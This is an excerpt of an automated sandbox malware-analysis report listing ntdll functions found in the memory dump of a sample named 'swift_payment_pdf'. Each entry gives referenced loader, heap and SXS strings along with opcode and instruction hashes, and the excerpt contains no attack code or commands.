                  • Opcode Fuzzy Hash: c7d48e67806fb394b69f6dd5fa9df7cb889ceed6a6cc9da5896fce5b37f3c3fd
                  • Instruction Fuzzy Hash: 959102B5B003199BEB25EF5CE856BAE7BA6BF41F2CF10412DE9407B691DB709801C790
                  Function 0134645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                  Download Yara Rule
                  Strings
                  • LdrpInitShimEngine, xrefs: 013A99F4, 013A9A07, 013A9A30
                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 013A99ED
                  • minkernel\ntdll\ldrinit.c, xrefs: 013A9A11, 013A9A3A
                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 013A9A01
                  • apphelp.dll, xrefs: 01346496
                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 013A9A2A
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-204845295
                  • Opcode ID: 2c963ae6b7d432759fa122f9607c4fe6476fcacf05ccdf5e847145162cc97f52
                  • Instruction ID: 1394810b7717e3b9d5204b86707a48afb4a79cff53141ca28abb74760bc211ad
                  • Opcode Fuzzy Hash: 2c963ae6b7d432759fa122f9607c4fe6476fcacf05ccdf5e847145162cc97f52
                  • Instruction Fuzzy Hash: 54519275208305DFE725DF28D851B6B7BE8FF85A4CF40491EF595AB260DA30E904CB92
                  Function 01382674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                  Download Yara Rule
                  Strings
                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 013C21BF
                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 013C2180
                  • RtlGetAssemblyStorageRoot, xrefs: 013C2160, 013C219A, 013C21BA
                  • SXS: %s() passed the empty activation context, xrefs: 013C2165
                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 013C219F
                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 013C2178
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                  • API String ID: 0-861424205
                  • Opcode ID: 015ab748e143ec37dd5c7bae2df9d1a50e604808a79d531dbed2a75c2564579a
                  • Instruction ID: 99aeda9a1f48cdb363cfab771eaa7ffd500a179fa1bc5ec67eda0aaed47a8908
                  • Opcode Fuzzy Hash: 015ab748e143ec37dd5c7bae2df9d1a50e604808a79d531dbed2a75c2564579a
                  • Instruction Fuzzy Hash: 673135BAB403157BF721AB9A8C85F5B7B78DBE5E5CF05005DFA05AB201D2709E01C3A0
                  Function 0138C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                  Download Yara Rule
                  Strings
                  • minkernel\ntdll\ldrredirect.c, xrefs: 013C8181, 013C81F5
                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 013C81E5
                  • Loading import redirection DLL: '%wZ', xrefs: 013C8170
                  • minkernel\ntdll\ldrinit.c, xrefs: 0138C6C3
                  • LdrpInitializeImportRedirection, xrefs: 013C8177, 013C81EB
                  • LdrpInitializeProcess, xrefs: 0138C6C4
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                  • API String ID: 0-475462383
                  • Opcode ID: 815641c59280b9fc72e4d8c0ae8e31090f484906ac427ee76b97043254391407
                  • Instruction ID: 5fa320fcd91762404b7e0ebc6af3ed360137fa0a194757d5389c1a12e60a7c30
                  • Opcode Fuzzy Hash: 815641c59280b9fc72e4d8c0ae8e31090f484906ac427ee76b97043254391407
                  • Instruction Fuzzy Hash: 6D3102726443469FD220EF2DD946E1A7BE4EF94F2CF04456CF9806B391E620ED04C7A2
                  Function 0139096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 01392DF0: LdrInitializeThunk.NTDLL ref: 01392DFA
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01390BA3
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01390BB6
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01390D60
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01390D74
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                  • String ID:
                  • API String ID: 1404860816-0
                  • Opcode ID: 99ef0191f0555aa21ced98d9193978f10dee65e5b6eef578b011fe6c40e8c2a4
                  • Instruction ID: 24879c7d13ae18b3f7dc5b19969d45d64e548a36e2b2c6918f0dae5dc27e6e69
                  • Opcode Fuzzy Hash: 99ef0191f0555aa21ced98d9193978f10dee65e5b6eef578b011fe6c40e8c2a4
                  • Instruction Fuzzy Hash: 17425B75900715DFDF25CF28C880BAAB7F9BF04318F1445A9E999EB241E770AA84CF61
                  Function 0135A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                  • API String ID: 0-379654539
                  • Opcode ID: c87b9f6f8d82b9c8c4c999042f70d6c9c4520cacc1bf0133df415cd4f17a5610
                  • Instruction ID: 00f86c61a354c81ba5861caea33194da93359da4034763db44385f176e579eee
                  • Opcode Fuzzy Hash: c87b9f6f8d82b9c8c4c999042f70d6c9c4520cacc1bf0133df415cd4f17a5610
                  • Instruction Fuzzy Hash: BEC18AB4108386CFD751CF58C040BAABBE8BF88B0CF044A6AF9959B750E734D949DB56
                  Function 01388402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                  Download Yara Rule
                  Strings
                  • @, xrefs: 01388591
                  • minkernel\ntdll\ldrinit.c, xrefs: 01388421
                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0138855E
                  • LdrpInitializeProcess, xrefs: 01388422
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-1918872054
                  • Opcode ID: e21e635d90e314865fdb254580b7d918a3eef50b2e34c1b546b1ffb8740ab609
                  • Instruction ID: 14c70c00ace2cf385e95be5dcc18c6fad3235a4cb791e46fa6b4fd44021851bc
                  • Opcode Fuzzy Hash: e21e635d90e314865fdb254580b7d918a3eef50b2e34c1b546b1ffb8740ab609
                  • Instruction Fuzzy Hash: CC918F71608345AFDB21EF69CC40EABBAECBF8475CF80496DF68496151E330D904CB62
                  Function 0138273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                  Download Yara Rule
                  Strings
                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 013C22B6
                  • .Local, xrefs: 013828D8
                  • SXS: %s() passed the empty activation context, xrefs: 013C21DE
                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 013C21D9, 013C22B1
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                  • API String ID: 0-1239276146
                  • Opcode ID: 86dd939acd15d939da005f8d77c8a059f3bf9f40c724262b8a7b055d6215b61b
                  • Instruction ID: 1a1ee300c9b291b85b4cd212b59fcdeb1ce698e78b742d9d8edb1f76480f3968
                  • Opcode Fuzzy Hash: 86dd939acd15d939da005f8d77c8a059f3bf9f40c724262b8a7b055d6215b61b
                  • Instruction Fuzzy Hash: 81A1BF35900329DBDF24EF69CC84BAAB7B5BF58758F1441EAE908A7251D7309E80CF90
                  Function 013564AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                  Download Yara Rule
                  Strings
                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 013B0FE5
                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 013B10AE
                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 013B106B
                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 013B1028
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                  • API String ID: 0-1468400865
                  • Opcode ID: 74599f59450e04012499f886d140c220481f56dfe8dc2fac2367c41dff17f39a
                  • Instruction ID: 15be40f7f44b8c8008e45e3d4fdd355fdf7c5f14436138363ff4f353fe48b61b
                  • Opcode Fuzzy Hash: 74599f59450e04012499f886d140c220481f56dfe8dc2fac2367c41dff17f39a
                  • Instruction Fuzzy Hash: 2171DDB1944345AFCB61DF18C885F9B7BA8AF54B6CF800968FD498B246D734D188CBD2
                  Function 0137245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                  Download Yara Rule
                  Strings
                  • LdrpDynamicShimModule, xrefs: 013BA998
                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 013BA992
                  • minkernel\ntdll\ldrinit.c, xrefs: 013BA9A2
                  • apphelp.dll, xrefs: 01372462
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-176724104
                  • Opcode ID: 0e027b264cc1fd34377cf22e4c75a9e9f015ed4efe31e625135cd97b8d0fe146
                  • Instruction ID: 65da4b6960076a41a26e8c8b7aa93832230433ea551762129cfe0f600053987f
                  • Opcode Fuzzy Hash: 0e027b264cc1fd34377cf22e4c75a9e9f015ed4efe31e625135cd97b8d0fe146
                  • Instruction Fuzzy Hash: D9315779A00205EBEB31DF5DD881EAABBB8FB84B0CF16405DFA0167665E7709881D790
                  Function 013629A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                  Download Yara Rule
                  Strings
                  • HEAP: , xrefs: 01363264
                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0136327D
                  • HEAP[%wZ]: , xrefs: 01363255
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                  • API String ID: 0-617086771
                  • Opcode ID: c6217daca6487d1435fa16e967efa13b63df7b291428cc0b4f67a86bc23697d9
                  • Instruction ID: 405fa722491db2c145987398547961949100d0488acd65d51f58ab2943a05e9d
                  • Opcode Fuzzy Hash: c6217daca6487d1435fa16e967efa13b63df7b291428cc0b4f67a86bc23697d9
                  • Instruction Fuzzy Hash: 2492BB70A04249DFDB25CF68C4447AEBBF9FF08308F19C069E859AB799D734A945CB50
                  Function 01360770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                  • API String ID: 0-4253913091
                  • Opcode ID: e3302f9d3582ae0b4cee7e734fd7c493e38d2df85ccf2e86925641897384f6f2
                  • Instruction ID: a33b7a1283463454c6cfa831e5552c58ea6a32ee9c0b887b362d3d1a8c083152
                  • Opcode Fuzzy Hash: e3302f9d3582ae0b4cee7e734fd7c493e38d2df85ccf2e86925641897384f6f2
                  • Instruction Fuzzy Hash: 01F1BF30600606DFEB29CF68C885BAABBF9FF44308F148169E5169B795D734E981CF90
                  Function 01376962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: $@
                  • API String ID: 0-1077428164
                  • Opcode ID: 087ce6f0ab08f35def266e31662e9f7d6a6456978b8b009bb58bcd8dde1f7551
                  • Instruction ID: 6651a0064d403e2943dc602d3db37b76d4c97da115d82f89e30bbc10959aa3e5
                  • Opcode Fuzzy Hash: 087ce6f0ab08f35def266e31662e9f7d6a6456978b8b009bb58bcd8dde1f7551
                  • Instruction Fuzzy Hash: 63C283716087459FEB35CF28C485BABBBE5AF88758F04892DF989C7241E738D805CB52
                  Function 0134A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: FilterFullPath$UseFilter$\??\
                  • API String ID: 0-2779062949
                  • Opcode ID: d92488e2ed053c9d74b91fb43b481ee5db681adadf31b4ed57f7a52e5e6e24ff
                  • Instruction ID: 46c99536d704ca79dd5b925b3f62f343d4d36392d28bd960112b674200374c3b
                  • Opcode Fuzzy Hash: d92488e2ed053c9d74b91fb43b481ee5db681adadf31b4ed57f7a52e5e6e24ff
                  • Instruction Fuzzy Hash: 61A17D769016299BDF31DF28CC88BEAB7B8EF44718F1041E9E909A7250D735AE84CF50
                  Function 01370BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                  Download Yara Rule
                  Strings
                  • Failed to allocated memory for shimmed module list, xrefs: 013BA10F
                  • LdrpCheckModule, xrefs: 013BA117
                  • minkernel\ntdll\ldrinit.c, xrefs: 013BA121
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-161242083
                  • Opcode ID: 255e5ca3e823349b3b2667eee4bbb5f90534bfae49aed3dc0a67abc0571bfe68
                  • Instruction ID: f327c6be9ac29c1b94ac4b548b4badfa25830051f63d201f0a9885887d96c198
                  • Opcode Fuzzy Hash: 255e5ca3e823349b3b2667eee4bbb5f90534bfae49aed3dc0a67abc0571bfe68
                  • Instruction Fuzzy Hash: EF71D174A0020ADFDF29DFACC981ABEB7F4FB45608F15402DE906EB615E734A941CB50
                  Function 01360A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                  • API String ID: 0-1334570610
                  • Opcode ID: bb713bfa9844102b49779dac35348f74bbbb3cbbbbd0f81d7302d242244bc86e
                  • Instruction ID: 9848a21c3b522db32eca47556c2a22aeb5fff55d84ba7da886181ca8c30c035c
                  • Opcode Fuzzy Hash: bb713bfa9844102b49779dac35348f74bbbb3cbbbbd0f81d7302d242244bc86e
                  • Instruction Fuzzy Hash: 6F61B0706003059FDB29CF28C481BAABBE9FF45708F14C55DE5898B79AD770E881CB91
                  Function 0138C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                  Download Yara Rule
                  Strings
                  • minkernel\ntdll\ldrinit.c, xrefs: 013C82E8
                  • LdrpInitializePerUserWindowsDirectory, xrefs: 013C82DE
                  • Failed to reallocate the system dirs string !, xrefs: 013C82D7
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-1783798831
                  • Opcode ID: ebe38e75fa95b689810eeb188a5bc30692dd6f75a0bad589fdcccdacd146db06
                  • Instruction ID: 989d2b0389effe88aaf2ee1928e81658f34283d10105b686a73f9e79872c92ce
                  • Opcode Fuzzy Hash: ebe38e75fa95b689810eeb188a5bc30692dd6f75a0bad589fdcccdacd146db06
                  • Instruction Fuzzy Hash: DD41DFB6540315AFDB31FB68D844B9B7BE8FF48A58F01492AF948D7264E770D800CBA1
                  Function 0140C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                  Download Yara Rule
                  Strings
                  • @, xrefs: 0140C1F1
                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0140C1C5
                  • PreferredUILanguages, xrefs: 0140C212
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                  • API String ID: 0-2968386058
                  • Opcode ID: bbf53cd9f3656900d584c89b0ad1d39d881e86330599806b7318b99d6d1d9c86
                  • Instruction ID: 96f783df0039460606f814382dcd54d89890e1f37b1f65d8a695d72edba7c0a8
                  • Opcode Fuzzy Hash: bbf53cd9f3656900d584c89b0ad1d39d881e86330599806b7318b99d6d1d9c86
                  • Instruction Fuzzy Hash: 1F416171E00209EBDF12DBD9C881BEEBBB8AB14714F1441BBE609A7690D7749A458B50
                  Function 013E4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                  • API String ID: 0-1373925480
                  • Opcode ID: b76715ec42c35850ce23d33d18acd011593ee93d6f9d4f2fa43fde886c3745d6
                  • Instruction ID: 701dce7895322c0984139021f897ce6520701983afa1c7530d58ebfae3957414
                  • Opcode Fuzzy Hash: b76715ec42c35850ce23d33d18acd011593ee93d6f9d4f2fa43fde886c3745d6
                  • Instruction Fuzzy Hash: 6141E172A04769CBEB25DB98C848BADBBF8FF59348F14045ADA01EB7D1D6349901CB10
                  Function 013D4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                  Download Yara Rule
                  Strings
                  • LdrpCheckRedirection, xrefs: 013D488F
                  • minkernel\ntdll\ldrredirect.c, xrefs: 013D4899
                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 013D4888
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                  • API String ID: 0-3154609507
                  • Opcode ID: cc8b71a0c4cddb300db310a7265973f286ca2cb283408bdedc2ac5528527c3fe
                  • Instruction ID: 97d5ab211be6814747f549e57572126f71f2aab73a75f42805c0b5d3048fd45c
                  • Opcode Fuzzy Hash: cc8b71a0c4cddb300db310a7265973f286ca2cb283408bdedc2ac5528527c3fe
                  • Instruction Fuzzy Hash: 8C41B037A042519BCB21CF6CF841A26BFE9BF49A98F060569ED98E7B11D731D800CB91
                  Function 01360BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                  • API String ID: 0-2558761708
                  • Opcode ID: f74b2dd9c00418598c4b379c9d46844ef2432fbe98e0305bc29917413e001037
                  • Instruction ID: b3ca139757fc109a40d09d7d46799f4a542110cdb677d86e07b09fa291b7460f
                  • Opcode Fuzzy Hash: f74b2dd9c00418598c4b379c9d46844ef2432fbe98e0305bc29917413e001037
                  • Instruction Fuzzy Hash: E011E131315106DFDB2DDB28C482BB6B3A8EF4061EF18C129F506DBA99EB38E840C750
                  Function 013D20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                  Download Yara Rule
                  Strings
                  • Process initialization failed with status 0x%08lx, xrefs: 013D20F3
                  • minkernel\ntdll\ldrinit.c, xrefs: 013D2104
                  • LdrpInitializationFailure, xrefs: 013D20FA
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-2986994758
                  • Opcode ID: b83400f5fdbdb4fbc455fd6c9ee8bded240389ad3034088a1fd0fab2f7cea25f
                  • Instruction ID: 429c891cd8a5780d0ea83333166f392c2ee5d7721ce2ac5993c2b8305f6c8dff
                  • Opcode Fuzzy Hash: b83400f5fdbdb4fbc455fd6c9ee8bded240389ad3034088a1fd0fab2f7cea25f
                  • Instruction Fuzzy Hash: C2F0C879640318AFE724EB5DDC42F963B68EB40F5CF104059FA407B281D5B0A904C695
                  Function 013603E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: #%u
                  • API String ID: 48624451-232158463
                  • Opcode ID: 91e8a71516400e247dfcfbcda5c47d1dbcd932331482626b8ba7b6c3ac3b3da5
                  • Instruction ID: bd6f70c7780f555dd50b843694e475076ddfdb4592658b382d05b292d4c9621e
                  • Opcode Fuzzy Hash: 91e8a71516400e247dfcfbcda5c47d1dbcd932331482626b8ba7b6c3ac3b3da5
                  • Instruction Fuzzy Hash: 93716A71A0010A9FDF05DFA8C990BAEB7F8FF18708F144065EA05A7256EA34ED01CB64
                  Function 0135A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                  Download Yara Rule
                  Strings
                  • LdrResSearchResource Enter, xrefs: 0135AA13
                  • LdrResSearchResource Exit, xrefs: 0135AA25
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                  • API String ID: 0-4066393604
                  • Opcode ID: b9ea99fb532cab31668660a4313b222e8c29a7a2f57df3169cda23b0cde28d42
                  • Instruction ID: 59be039f12651de54c0c843b9ba1b72bd492ec710cef834e334eefcff565eb10
                  • Opcode Fuzzy Hash: b9ea99fb532cab31668660a4313b222e8c29a7a2f57df3169cda23b0cde28d42
                  • Instruction Fuzzy Hash: 14E17171E00219ABEF62CE9DC980FEEBBB9BF44718F144626EE01E7651E7349940DB50
                  Function 0141A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: `$`
                  • API String ID: 0-197956300
                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                  • Instruction ID: 23fff3db130d2d4f91d33ab8c3e291e06f2c5a15538e69929bfd501a1bc3c616
                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                  • Instruction Fuzzy Hash: CFC1F5312053829BE725CF29C840B6BBBE5BFD4318F284A2EF699C72A8D774D505CB41
                  Function 013CE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: Legacy$UEFI
